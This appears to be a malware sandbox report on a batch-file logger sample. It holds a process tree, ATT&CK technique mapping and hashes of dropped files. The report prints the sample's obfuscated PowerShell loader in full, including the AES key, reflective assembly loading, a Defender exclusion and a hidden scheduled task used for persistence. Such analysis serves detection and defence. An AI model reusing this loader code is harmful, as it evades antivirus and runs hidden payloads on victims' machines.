execute_function($param_var,$param2_var){ $buZKU=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $xpTey=$buZKU.EntryPoint; $xpTey.Invoke($null, $param2_var);}function Add-DefenderExclusion($path_var){ try { Add-MpPreference -ExclusionPath $path_var; } catch { }}$oovly = 'C:\Users\Admin\Desktop\HybridloggerV5.bat';$host.UI.RawUI.WindowTitle = $oovly;$ywjFO=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($oovly).Split([Environment]::NewLine);foreach ($ANKGG in $ywjFO) { if ($ANKGG.StartsWith(':: ')) { $oFhCt=$ANKGG.Substring(3); break; }}$payloads_var=[string[]]$oFhCt.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));Add-DefenderExclusion $oovly;execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:4420
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_796_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_796.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:4888
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_796.vbs"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2040
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_796.bat" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3240
    - - C:\Windows\system32\net.exe
        
        net file
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2984
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        6⤵
        
        PID:4500
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tzbNpPr1z3nGvgbpSokBMPfW5jnpdEOgrRJQ/JKp40o='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WGsJ0QdC6jC+sSlmc6qolg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $HpRNZ=New-Object System.IO.MemoryStream(,$param_var); $zCfEW=New-Object System.IO.MemoryStream; $OjVcm=New-Object System.IO.Compression.GZipStream($HpRNZ, [IO.Compression.CompressionMode]::Decompress); $OjVcm.CopyTo($zCfEW); $OjVcm.Dispose(); $HpRNZ.Dispose(); $zCfEW.Dispose(); $zCfEW.ToArray();}function execute_function($param_var,$param2_var){ $buZKU=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $xpTey=$buZKU.EntryPoint; $xpTey.Invoke($null, $param2_var);}function Add-DefenderExclusion($path_var){ try { Add-MpPreference -ExclusionPath $path_var; } catch { }}$oovly = 'C:\Users\Admin\AppData\Roaming\startup_str_796.bat';$host.UI.RawUI.WindowTitle = $oovly;$ywjFO=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($oovly).Split([Environment]::NewLine);foreach ($ANKGG in $ywjFO) { if ($ANKGG.StartsWith(':: ')) { $oFhCt=$ANKGG.Substring(3); break; }}$payloads_var=[string[]]$oFhCt.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));Add-DefenderExclusion $oovly;execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2612

C:\Windows\System32\NOTEPAD.EXE
"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\Desktop\HybridloggerV5.bat
1⤵
- Opens file in notepad (likely ransom note)
PID:3944

C:\Windows\System32\NOTEPAD.EXE
"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\Desktop\HybridLoggerFixed.bat
1⤵
- Opens file in notepad (likely ransom note)
PID:1580

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1648
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Checks processor information in registry
  - Modifies registry class
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  PID:2968
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1948 -parentBuildID 20240401114208 -prefsHandle 1864 -prefMapHandle 1856 -prefsLen 23678 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {debc5218-76cb-4d08-9f9a-b9994bd45d05} 2968 "\\.\pipe\gecko-crash-server-pipe.2968" gpu
    3⤵
    PID:4432
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2348 -parentBuildID 20240401114208 -prefsHandle 2340 -prefMapHandle 2232 -prefsLen 23714 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4b7a5baf-a01c-4d24-b406-39e78cc05c44} 2968 "\\.\pipe\gecko-crash-server-pipe.2968" socket
    3⤵
    PID:3568
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2576 -childID 1 -isForBrowser -prefsHandle 2608 -prefMapHandle 3172 -prefsLen 23855 -prefMapSize 244658 -jsInitHandle 1192 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4ac9da93-27b7-4a73-8771-ac21f1a4d784} 2968 "\\.\pipe\gecko-crash-server-pipe.2968" tab
    3⤵
    PID:4916
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3664 -childID 2 -isForBrowser -prefsHandle 3656 -prefMapHandle 3652 -prefsLen 29088 -prefMapSize 244658 -jsInitHandle 1192 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4adcb2d5-04f1-4aa6-944b-e3ad0afafc8d} 2968 "\\.\pipe\gecko-crash-server-pipe.2968" tab
    3⤵
    PID:1292
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4612 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4496 -prefMapHandle 4576 -prefsLen 29088 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ed9768b9-306f-418c-bba1-6a654a0be617} 2968 "\\.\pipe\gecko-crash-server-pipe.2968" utility
    3⤵
    - Checks processor information in registry
    PID:2068
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5372 -childID 3 -isForBrowser -prefsHandle 5364 -prefMapHandle 5328 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 1192 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e8d4f123-f7f2-4a2e-be50-8b7b59f96229} 2968 "\\.\pipe\gecko-crash-server-pipe.2968" tab
    3⤵
    PID:1680
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5508 -childID 4 -isForBrowser -prefsHandle 5516 -prefMapHandle 5520 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 1192 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {146836d5-8eda-4ca0-9436-2d3c1d1998e6} 2968 "\\.\pipe\gecko-crash-server-pipe.2968" tab
    3⤵
    PID:4960
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5692 -childID 5 -isForBrowser -prefsHandle 5700 -prefMapHandle 5704 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 1192 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ced2972b-0ba1-4108-9e0a-d050ac33ffdf} 2968 "\\.\pipe\gecko-crash-server-pipe.2968" tab
    3⤵
    PID:4976
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6156 -childID 6 -isForBrowser -prefsHandle 6148 -prefMapHandle 6152 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1192 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {141d16a2-d097-418c-b87d-b2f811608241} 2968 "\\.\pipe\gecko-crash-server-pipe.2968" tab
    3⤵
    PID:4396

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc
1⤵
PID:4248

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k UnistackSvcGroup
1⤵
PID:1136

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
df472dcddb36aa24247f8c8d8a517bd7

SHA1
6f54967355e507294cbc86662a6fbeedac9d7030

SHA256
e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6

SHA512
06383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
4fc204cd72f2c3f6149d487b16ea4a83

SHA1
ac5f7fae2c1ac704ad559069589844a89c0b7410

SHA256
dc706e6f21d6e4b670e36f3ed9772fef5f47d30af28f587f14ccd2f6348d14d8

SHA512
d6e90367ab4efcc2364ac7ad18763ba79b3f5ac638cefd1ec651bee9e9b6d3753b24e41bf774ce400024f1befd3b33e33fc89f0ec836e8e8256a39719a303ac4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
347464846ee2b0bb6098b7587469257b

SHA1
6e73475a8b64c8254234e79e2af04c6c29daa3e5

SHA256
41bab3797cdfa20347ef0af2462c31ab6fd9d6f703d94a7fa6a3c6f3eaded8ef

SHA512
08b977aad9fcc49a4069051193b79bfcbbfc35380160777f6c74bd05ba7edd45edf80afe9a98ec7db6d99b3089a998450d952e53de38b3ea7f58617d72cc3c79

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\p38rro19.default-release\activity-stream.discovery_stream.json

Filesize
19KB

MD5
5afd0bd26df5f6205fb754f1cefb6350

SHA1
9f11af81e1d320aa5271f46ea7c06a00a16abea8

SHA256
dab8839f6083188cda581d6861c7ad632b52a947cb6bdab141f73d386006aa3c

SHA512
da75150e1b7cd849e3bb1902a532bbcca6936ddfea5f6145f48f33cf6a23696ec8dac8fb832f09f11bda055feed4d14257b5613721a4a4eb51b01cc827e88dfa

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\p38rro19.default-release\cache2\entries\5EFB7B0E6074226F79A8AA9919C3E295081C6B61

Filesize
61KB

MD5
11ebffa798777bb17368d931eea8fca6

SHA1
500c2e7c018007a4672c081308605c1b1fc00c6b

SHA256
513fadf1dd5ee4177325f3bec45c46f2df89bb6c4d071035cb9795a3689fdc0b

SHA512
9956a98d22ab65c56b0ce54709f1572cf5bb06b7dccc8e86bdbed03dff43d0924ca3dec8ca82bf92aec5335d822e1cd3e5126ffb446fb7dc9ca258751e895e14

Download Submit
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AC\BackgroundTransferApi\2c4fe3d1-c723-4772-90f6-be13caade905.down_data

Filesize
555KB

MD5
5683c0028832cae4ef93ca39c8ac5029

SHA1
248755e4e1db552e0b6f8651b04ca6d1b31a86fb

SHA256
855abd360d8a8d6974eba92b70cbd09ce519bc8773439993f9ab37cb6847309e

SHA512
aba434bd29be191c823b02ea9b639beb10647bbe7759bbffdaa790dfb1ec2c58d74c525ef11aacda209e4effe322d1d3a07b115446c8914b07a3bce4d8a0e2c3

Download Submit
C:\Users\Admin\AppData\Local\Temp\HybridLoggerFixed.bat

Filesize
12KB

MD5
89a22d3791ca38666c8144725a74497d

SHA1
96b672089a3c783e4dd27e8da7c0cc1245d55cfd

SHA256
9326ad90526504bfbc876646087bf41a82128fd5d995f624b13ea7ef3e154b94

SHA512
6b73d4fde3a673be8ea4aa169382b8aed1577817193545666a18cc83e918a642adf464090f2c1938b0f75f322e8e18e5304bf15c8eda71b4c072aaea5c294b2e

Download Submit
C:\Users\Admin\AppData\Local\Temp\HybridloggerV5.bat

Filesize
910KB

MD5
72ecd938d114e246eeebc8ae430fc2e9

SHA1
9ece59be22ceadcb3951093483cc69a76658801d

SHA256
4eafc8d12d2e402d7de955ffa3940c070d40dea9f2eda1260962518204304f65

SHA512
d2839e5226f9753f5098072b5cb7ab0f30318f3255355ae69fc75efc0ecfced89eb74788716b01a511e2461fa1c21052a336c1873aa82ef411cb710c4f14059e

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_j0zdbqkf.rls.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpaddon

Filesize
479KB

MD5
09372174e83dbbf696ee732fd2e875bb

SHA1
ba360186ba650a769f9303f48b7200fb5eaccee1

SHA256
c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f

SHA512
b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

Filesize
13.8MB

MD5
0a8747a2ac9ac08ae9508f36c6d75692

SHA1
b287a96fd6cc12433adb42193dfe06111c38eaf0

SHA256
32d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03

SHA512
59521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SKDQLKLSBFEBBE94QI6Y.temp

Filesize
7KB

MD5
ac96efd3d994b83a606b5775715ce18a

SHA1
27b0ba654527431495673fa932315fb0f43b0ff8

SHA256
c1714f27cd4217706afe2ba624b3e957ec497ff751c76546f66ce2d5648ec492

SHA512
dce213940289f57843876ce81d9c6a1efd7dfd0933729c0472606019c670f4ebc2965148bd7e9547e9573e29e687bef756614b06875da9ae4eb97495d98aa19f

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p38rro19.default-release\AlternateServices.bin

Filesize
6KB

MD5
7865c0f8ec801cb2903ea93ce3f0ff53

SHA1
cbd9b53fa19537548f4d89f1d6ef0c2f64d02118

SHA256
c4c6e3b3f857543d3dd7515ec38eee13345a47f41d8b6b200aeebb2b428551aa

SHA512
270d3b0b4ae2264b69f314c00323031f50c78db62706cef2d29cd5a8fdfb545a9f9591f781c1abceb8e3e2c5498721898bba210e2527fcaef54cca607df45980

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p38rro19.default-release\AlternateServices.bin

Filesize
12KB

MD5
40d1a7b1c737b5becd96e5348116bcaa

SHA1
98925dcbabef247bc02446774c54ea72b4e391ed

SHA256
a3a53963c58c0a3a1e4394368eb83a639010855a11f3d87a28305b781276dc65

SHA512
23497c490c9e937e71016ab65c7dce269caf35b5c57d6d8c3141bc7004c5998b2070794a8b6eb2a84a602aa64b3c3b406962cc37c38f7cd7582572bafb306386

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p38rro19.default-release\bookmarkbackups\bookmarks-2024-11-08_11_HqHz5fhuf3bPXr744nsEAg==.jsonlz4

Filesize
998B

MD5
a1992523a27b3f65bcf577742be2c5d8

SHA1
c20013067a013b3022da8653587d8bf8e3b70065

SHA256
66bcafc875b286cff7e4e6ae5f9bc2352557a03753489a189af156d25d011188

SHA512
e4eda6e5c02425e0bf2ebdc9d13ebcd67f8e4d41cc9d4b16e60b514c9830e165f4f6cecded34de9d0eb0cd773ff52c744b9c55e351372b43ea05eaf12b92c33a

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p38rro19.default-release\datareporting\glean\db\data.safe.tmp

Filesize
5KB

MD5
fbb1ef6d3b57fc8bf5a552395c2aff21

SHA1
74b0c0e88a3005059c101c8392688e6f9b701e1d

SHA256
24f3a78f810b77304ac141a3e77f8ffd214bad3110999fc128caaaf0275f6d26

SHA512
c7176ed5df81da7895c19ac485f0963061bdb0d53a68dd9df7a1a4d921454b215873b369bff2e0faa72b1b2739514ad145a6933b33ab6f7148ad359e01e3423f

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p38rro19.default-release\datareporting\glean\db\data.safe.tmp

Filesize
37KB

MD5
065cf427cb06f31f609aa1fcb6d9ee8b

SHA1
09576dae7a2c04cedee547f8992aeff27cd61200

SHA256
2ca8c762150723620f11e904df29e0475428f59ed9e764cf29a8d00c78ce73c5

SHA512
6704efc2c17ac8914d4e423a6e79569b92d4ea22f2ca1729103971833fc249865b53a12256b5b6b6e4fdb5a532b02be2017f5113d7d6d18ea06f8fee024501f7

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p38rro19.default-release\datareporting\glean\db\data.safe.tmp

Filesize
6KB

MD5
1ec6924a7a31c266f6d9e9ca4ef7b248

SHA1
63efbd969ce5ab99cd292a58cec3cd616da97de4

SHA256
840bfdd0030b3d48c2cc3eb60d912539328412b8638dbc3e76d8e6a33832961e

SHA512
d7c02cd44a33ece33f0298d040ed7d63db528749fb95c4c8eb1b1fa7355962d58a4d7595d5e413a60ca58d97bd48f1eee7eac42429cfbc7a5ee2fd96e048f8a1

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p38rro19.default-release\datareporting\glean\db\data.safe.tmp

Filesize
37KB

MD5
de6ef5236ecf34a40b0f5900268c287e

SHA1
4de576d0bc5314d14e9b6371ea595d899f1073a3

SHA256
3641bce859bc5119de256a687cc66fd3407c6056a798ca739cdcf2a50c49fe82

SHA512
5cb682edf0fe70cc832fa00fbab29223df08d643dfb62f03890418c18c7e6ce919db6cbb01d3c441b8d14eaac4003d43aacd41e2eacfdb7ff7324a6ab046d48c

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p38rro19.default-release\datareporting\glean\db\data.safe.tmp

Filesize
34KB

MD5
3a47ef234e47bfd39d11790ccc85a0e2

SHA1
cb0369dac07ad1fc927ffdb2f5be649309f3615c

SHA256
a610d727bd4756c2d2527335290631a400b63f5b3ce81fd43c091c1b1beb289f

SHA512
a71aae2bfde32c973f5e2865c46194987334ba2dc90c72a2bc1fb73161cbd9031c534980b3acbc197b27b3db745cea03b66e2d7e1e7eb64d972e08857d30a15b

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p38rro19.default-release\datareporting\glean\db\data.safe.tmp

Filesize
36KB

MD5
cec4b263c4aecd2a7001a3a268394ee5

SHA1
95263103befa93317b17ee9eca1ad76ac6006ff8

SHA256
0e14f3b9a26f6e1563f5601fa3409bd544febf69cf7359e901359761bcb0483e

SHA512
339131be593bd6a309b8ccecc0afd1cdb64bb5e2e3d00dfcbcf15e728fb2945df49aa001c90af7c87d0483c547f76faf75b1296aaa76e0f25c818128cd18265c

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p38rro19.default-release\datareporting\glean\pending_pings\10ea47ae-57c2-43c9-8366-c001b9b41e3b

Filesize
26KB

MD5
f99a361bf79fee487ece63dc5afe0d2d

SHA1
1716bac15442813d7fc52904504542af262ddd46

SHA256
87cf08a363c5a26a91d7ba7d20a3d2fbc9066cd304665fe925b6cff988b84800

SHA512
ab135762e44a098f5b3cfeda1c66894dfdce1c37f4ad0a48ca2dfe1e729730e302b72dde0d0871f5cced20c60f14f40bcd59314b5f658dffa07a0367eb28f00e

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p38rro19.default-release\datareporting\glean\pending_pings\2fbc1686-a05f-4e32-9a63-7386428077ed

Filesize
982B

MD5
881c2e22ab9666ec34c9c4691ae2b61f

SHA1
60120b2205434c4e79b92291f920cf1a0a2e7ee8

SHA256
fa877c5564b1625381daa5a1517b99d312acf945fe46c4f0e68a737ca9aef34d

SHA512
fbf8dab6a46e26f59772ecc14c549429d4e0872010043ec6fcd7730ddbaa2a35cf6b6093c53f3b9265688bd847b0e70296533989619a2bd0a6ff9dcca3d77d28

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p38rro19.default-release\datareporting\glean\pending_pings\a1ca5081-c74c-49f5-a44f-961c15d7f2e1

Filesize
671B

MD5
2790daded4faa00d3584f868c9b5dee3

SHA1
c6c484bb88fcada7192e95aad4c1e5a13cbbb5b6

SHA256
7d0669b24b8d2b6a5056ce458b7c73a7d5da0cb2147d37a4202eee8a1d887341

SHA512
c9b3abe727fffe0050cba6aa076fd39dad0debf59ced747e85769e138ff82e430db37c047a3f042f28b9aa670af683bea3ec89b82642a738a26e26ff0b9663a4

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p38rro19.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll

Filesize
1.1MB

MD5
842039753bf41fa5e11b3a1383061a87

SHA1
3e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153

SHA256
d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c

SHA512
d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p38rro19.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info

Filesize
116B

MD5
2a461e9eb87fd1955cea740a3444ee7a

SHA1
b10755914c713f5a4677494dbe8a686ed458c3c5

SHA256
4107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc

SHA512
34f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p38rro19.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json

Filesize
372B

MD5
bf957ad58b55f64219ab3f793e374316

SHA1
a11adc9d7f2c28e04d9b35e23b7616d0527118a1

SHA256
bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda

SHA512
79c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p38rro19.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll

Filesize
17.8MB

MD5
daf7ef3acccab478aaa7d6dc1c60f865

SHA1
f8246162b97ce4a945feced27b6ea114366ff2ad

SHA256
bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e

SHA512
5840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p38rro19.default-release\prefs-1.js

Filesize
10KB

MD5
f350d5754a3107a760171ea3192b9e02

SHA1
216120f636f6edf014e819c52a4a1ff9cd5e0d70

SHA256
0239eaf5a1e16c65d06dfb686872812cf4806430c71b6f1b1f1ec432583215d3

SHA512
24473058dedffe38a1f2da75d8c17d12a6ad5bb067e52b9d828e778021f2b5125d85cc4003ccc8352bc8b69cd95e559419432f23a9b56024ba6bab393774341e

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p38rro19.default-release\prefs-1.js

Filesize
11KB

MD5
abacfba494be9aba10f0b6c3e106a547

SHA1
41a0afeab7ad3af71af5bb820f192a12feb404b5

SHA256
e2bdb82269e94d5fd119e4b43562ad711646bab671d15305b209c0140739b593

SHA512
33c5741fe8b66b1f2336b6af439636f1e52d6c3f70336c2203b05aa296977c9acdc36761ff4b8c8550ff6ba4347ccf38642de4932551e69617bf3603818dc0e4

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p38rro19.default-release\prefs-1.js

Filesize
12KB

MD5
f14003894bbc19119bfa60e62717ec2c

SHA1
42705ecee7f851b0d7830b0598e8fb8a0c47ff47

SHA256
056bb1c9e6a690b3c8129246611b3c76ddb78d46f1abd762c9afae2846063bfc

SHA512
cf8633f5e583b0a28fb9b9401fa73c5b4b67d8d3ba510000589025c8e630323d9685617a6e1d0c8103abe482318b73122b353690c9ac364e3d5e440ef44a2276

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p38rro19.default-release\prefs.js

Filesize
10KB

MD5
a6ac8b6edf32a108b43903e68f593429

SHA1
100a1dd3c0dce4142dc987f71a7b6719e58c2cb0

SHA256
4c2c8c6c8cf4d458b97e9572832f3b7d3a91b2d041199c94cdf3addeeab3c39c

SHA512
066fdabd384413f1fcefcce4b6f9a64a9a7c8bcfd2dc7ea44dd9fd9b4960b6a9af812a1d051aa9eb7197913d4915c9208ef72fdbc3de2a865c9fa91438eb9e54

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p38rro19.default-release\sessionstore-backups\recovery.baklz4

Filesize
3KB

MD5
2d045ef3e187798b3628d581e2f87368

SHA1
fff14a5adce394c705ee27386ce6c467ac552fd8

SHA256
617a49e52fd0ca452aabd9b66d9c4bd15bd0f818eb72e28c7a05669d5b662fd2

SHA512
1cb3a19a3ede54d6ff3a305185c17fc3de088d63138b4502b329f66e64fd91dccf215a0f50ba66be4ca43abb1eb76ce665150c89ed07a402e5ed56df3e906a03

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p38rro19.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite

Filesize
584KB

MD5
dfdfecce77fc59ae067eedb9b4c1a29b

SHA1
8d9007864e04e747eca1441f8c4aa1025b8f791a

SHA256
06a55e51316d7a4f9cef1232f09f9c9fcfdbd681f4d33c33cc2f5d095727db37

SHA512
608d13ab939485141f2d9ac76f0f30640a8c95332d9dad172e3a0b512e139c791405add18eb8b92f52ad1910f6d394d5750cf2de5c48854e9617da96cb800240

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_473.vbs

Filesize
115B

MD5
425407305b1683676e8a9bc0e0e8d3e9

SHA1
038a53ec50be655cc8fd5e23b43ed594932bcc5b

SHA256
2a6897c42e8bf5ad49ceef93e697425ac28416648b5be8ea067a165be703bf8c

SHA512
